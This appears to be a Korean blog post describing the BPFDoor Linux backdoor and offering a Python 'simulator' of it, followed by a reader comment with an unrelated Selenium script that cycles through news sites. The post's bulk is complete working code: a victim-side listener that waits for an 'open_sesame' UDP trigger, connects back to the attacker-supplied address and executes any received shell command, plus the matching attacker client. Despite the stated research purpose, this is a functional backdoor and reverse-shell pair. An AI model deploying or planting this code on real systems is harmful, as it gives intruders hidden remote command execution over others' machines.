bpfdoor-like 백도어 시뮬레이터

bpfdoor란?

bpfdoor는 2022년 발견된 리눅스 기반의 고도화된 백도어 악성코드로, 다음과 같은 특징을 가집니다.

  • 패킷 필터링: BPF(Berkeley Packet Filter)를 이용해 네트워크 인터페이스의 패킷을 직접 감시하며, 특정 트리거 패킷을 탐지합니다.
  • 포트리스 백도어: 별도의 리스닝 포트 없이, 트리거 패킷이 도착할 때만 임시로 리버스 쉘을 오픈합니다.
  • 은닉성: 흔적을 남기지 않고, rootkit 없이도 탐지 회피가 가능합니다.
  • 다양한 프로토콜 지원: TCP, UDP, ICMP 등 다양한 프로토콜로 트리거를 받을 수 있습니다.
  • 공격자 지정: 트리거 패킷에 공격자의 IP/포트 정보를 담아, 공격자가 원하는 곳으로 리버스 쉘을 연결합니다.

bpfdoor의 핵심 동작 원리를 Python으로 시뮬레이션한 예제입니다.

bpfdoor-like 백도어 시뮬레이터

이 프로젝트는 실제 bpfdoor 백도어의 동작을 학습/연구 목적으로 Python으로 최대한 유사하게 시뮬레이션한 예제입니다.

주요 구성 파일

  • bpf.py : 서버(피해자) 역할. 트리거 패킷을 수신하면 공격자에게 리버스 쉘을 연결합니다.
  • client.py : 클라이언트(공격자) 역할. 트리거 패킷을 전송하고, 리버스 쉘 연결을 받아 명령을 실행합니다.

동작 방식

  1. 공격자(client.py)

    • 자신의 IP/포트 정보를 포함한 트리거 패킷을 피해자에게 UDP로 전송합니다.
    • 이후 해당 포트에서 리버스 쉘 연결을 대기합니다.
    • 연결이 오면 명령을 입력할 수 있습니다. __KILL__ 명령을 입력하면 서버가 종료됩니다.
  2. 피해자(bpf.py)

    • 지정된 포트에서 트리거 패킷을 대기합니다.
    • 트리거 패킷을 수신하면, 패킷에 포함된 공격자 IP/포트로 TCP 리버스 쉘을 연결합니다.
    • 쉘에서 명령을 받아 실행하고 결과를 반환합니다. __KILL__ 명령을 받으면 즉시 종료합니다.

예시 실행 방법

  1. 공격자(client.py) 실행
python3 client.py
  1. 피해자(bpf.py) 실행
python3 bpf.py

소스 코드

bpf.py

import socket
import subprocess
import threading
import struct
import os

# 설정
TRIGGER_KEYWORD = b"open_sesame"
LISTEN_PORT = 5555

def reverse_shell(conn):
    conn.send(b"Reverse shell connected. Type commands:n")
    while True:
        conn.send(b"$ ")
        cmd = conn.recv(1024).decode().strip()
        if cmd == "__KILL__":
            conn.send(b"[!] Server terminating by remote command.n")
            conn.close()
            os._exit(0)
        if cmd.lower() in ["exit", "quit"]:
            break
        try:
            output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as e:
            output = e.output
        conn.send(output)
    conn.close()

def packet_listener():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP
    s.bind(("0.0.0.0", LISTEN_PORT))
    print(f"[+] Listening for trigger on UDP port {LISTEN_PORT}...")

    while True:
        data, addr = s.recvfrom(1024)
        print(f"[+] Packet received from {addr}")
        # 트리거 패킷: b"open_sesame" + 4바이트 IP + 2바이트 포트
        if data.startswith(TRIGGER_KEYWORD) and len(data) >= len(TRIGGER_KEYWORD) + 6:
            ip_bytes = data[len(TRIGGER_KEYWORD):len(TRIGGER_KEYWORD)+4]
            port_bytes = data[len(TRIGGER_KEYWORD)+4:len(TRIGGER_KEYWORD)+6]
            attacker_ip = socket.inet_ntoa(ip_bytes)
            attacker_port = struct.unpack("!H", port_bytes)[0]
            print(f"[!] Trigger detected. Connecting back to {attacker_ip}:{attacker_port}")
            threading.Thread(target=connect_back, args=(attacker_ip, attacker_port)).start()
        else:
            print("[!] Trigger keyword not detected or attacker info missing.")

def connect_back(ip, port):
    try:
        shell_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell_socket.connect((ip, port))
        print(f"[+] Connected to attacker at {ip}:{port} for reverse shell.")
        reverse_shell(shell_socket)
        shell_socket.close()
    except Exception as e:
        print(f"[!] Failed to connect back: {e}")

if __name__ == "__main__":
    try:
        packet_listener()
    except KeyboardInterrupt:
        print("n[!] Stopped.")

client.py

import socket
import struct
import threading

def send_trigger(target_ip, target_port, attacker_ip, attacker_port):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = b"open_sesame" + socket.inet_aton(attacker_ip) + struct.pack("!H", attacker_port)
    s.sendto(payload, (target_ip, target_port))
    s.close()
    print(f"[+] Trigger sent to {target_ip}:{target_port}")

def handle_shell(conn):
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            print(data.decode(errors="ignore"), end="")
            cmd = input()
            conn.send((cmd + "n").encode())
            if cmd.lower() in ["exit", "quit"]:
                break
    except Exception as e:
        print(f"[!] Shell connection error: {e}")
    finally:
        conn.close()

def listen_shell(listen_ip, listen_port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((listen_ip, listen_port))
    server.listen(1)
    print(f"[+] Waiting for reverse shell on {listen_ip}:{listen_port} ...")
    conn, addr = server.accept()
    print(f"[+] Connection from {addr}")
    handle_shell(conn)
    server.close()

if __name__ == "__main__":
    # 설정: 공격자 IP/포트, 타겟 IP/포트
    attacker_ip = "127.0.0.1"
    attacker_port = 4444
    target_ip = "127.0.0.1"
    target_port = 5555

    # 리버스 쉘 대기 스레드 시작
    t = threading.Thread(target=listen_shell, args=(attacker_ip, attacker_port))
    t.start()
    # 트리거 패킷 전송
    send_trigger(target_ip, target_port, attacker_ip, attacker_port)
    t.join()

참고

  • 연구 및 교육 목적으로만 사용하세요.

1 thought on “bpfdoor-like 백도어 시뮬레이터”

  1. import time
    from selenium import webdriver
    from selenium.webdriver.chrome.service import Service
    from selenium.webdriver.chrome.options import Options

    # 신문사 주소 리스트
    urls = [“https://www.chosun.com”, “https://www.hani.co.kr”, “https://www.donga.com”]

    # Chrome 브라우저 설정
    chrome_options = Options()
    chrome_options.add_argument(“–start-maximized”)

    # 드라이버 경로 (ChromeDriver가 설치된 경로 지정 필요)
    service = Service(executable_path=”/opt/homebrew/bin/chromedriver”) # 예: “/usr/local/bin/chromedriver”
    service = Service(executable_path=”/opt/homebrew/bin/chromedriver”)

    # 브라우저 열기
    driver = webdriver.Chrome(service=service, options=chrome_options)

    try:
    while True:
    for url in urls:
    driver.get(url)
    time.sleep(10) # 10초 대기
    except KeyboardInterrupt:
    driver.quit()

    응답

Leave a Comment